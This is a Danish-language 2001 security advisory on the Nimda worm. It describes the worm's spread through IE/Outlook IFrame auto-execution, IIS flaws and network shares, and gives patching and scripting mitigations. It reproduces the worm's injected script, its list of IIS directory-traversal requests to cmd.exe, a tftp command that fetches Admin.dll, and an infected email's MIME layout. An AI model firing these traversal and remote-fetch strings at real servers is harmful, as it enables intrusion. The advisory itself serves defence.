Navn: W32.Nimda.worm
Risiko: HØJ
Oprindelse: ?
W32.Nimda.worm er en høj risiko virus der spreder sig ved at udnytte en
sårbarhed i Outlook/IE (IFrame ) og adskillige andre som omfatter IIS. Denne
orm er krydsinficerende og udnytter stort set samtlige kendte sårbarheder,
som kan afvikle (remotely) kode på Microsoft IIS 4.0 og 5.0 (den laver alle
tænke GET kommandoer). Derudover spreder den sig fra inficerede hjemmesider
via Iframe sårbarheden, som tillader at kode afvikles automatisk uden
interaktion fra brugeren hvis maskinen ikke er opdateret eller understøtter
active scripting. Ormen tilføjer følgende streng til hjemmesider som
kompromitteres: "<html><script
language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>". Vi tæller allerede nu
adskillige hundrede danske hjemmesider.
Inficerede PC'ere og servere scanner efter infektion efter andre systemer
der kan infiltreres ved at udnytte gamle og nye sårbarheder. Her findes en
liste over de kald som ormen laver mod andre hosts i håb om at finde en
sårbar IIS-server.
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
Ormen indeholder teksten: "Concept Virus(CV) V.5, Copyright(C)2001
R.P.China". Det er højest sandsynligt, at den udspringer fra andre kilder
end den indlysende signatur.
Fra private PC'ere sender den sig selv videre til samtlige fortegnelser i
Outlooks adressekartotek ligesom den spreder sig via Netværk shares. Det
sker via SMB/CIFS som "C$" hvor den tilføjer en Guest konto til den lokale
administrator gruppe. På hver enkelt delt mappe den finder droppes følgende
filer: sample.nws, sample.eml, desktop.eml, desktop.nws.
Den dropper derudover mindst 4 filer i mappen:
(root)\Program Files\Common Files\msadc\
root.exe, TFTP129.exe, TFTP68.exe, TFTP192.exe.
Ormen syntes, at være primært bærende via email hvor den automatisk afvikles
hvis den vises i "preview pane" i Outlook/OE på en maskine som ikke er
opdateret med patch fra Microsoft..En inficeret email vil (den kan også være
blank i emne og indhold men vil altid anvende samme filnavn) ankomme med
følgende header:
Emne:
Xdesktopdesktopdesktopdesktopsamplesampledesktopsamplesamplesamplesampledesk
topdesktopsamplesampledesktopsamplesampledesktopdesktopsamplesamplesample
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
For at udgå at blive inficeret af denne orm kan man deaktivere aktive
scripting. Det kan gøres på følgende måde:
Højreklik på IE ikonet, vælg egenskaber, klik på fanebladet sikkerhed og
herunder brugerdefineret niveau. Gå ned på listen og deaktiver aktive
scripting.
Alle som administrerer en IIS server skal snarest opdatere med en samling af
patches, som er frigivet af Microsoft og som kan hentes på følgende adresse:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
Yderligere informationer om den sårbarhed, som ormen anvender til at sprede
sig via email og fra kompromitterede hjemmesider kan findes hos Georgi
Guninski på adressen:
http://www.guninski.com/frame2-desc.html
Med venlig hilsen / Best regards
Peter Kruse
Security- and virusresearch
Telia Telecom / Telia Security Group
Søren Frichsvej 34C - DK 8230 Åbyhøj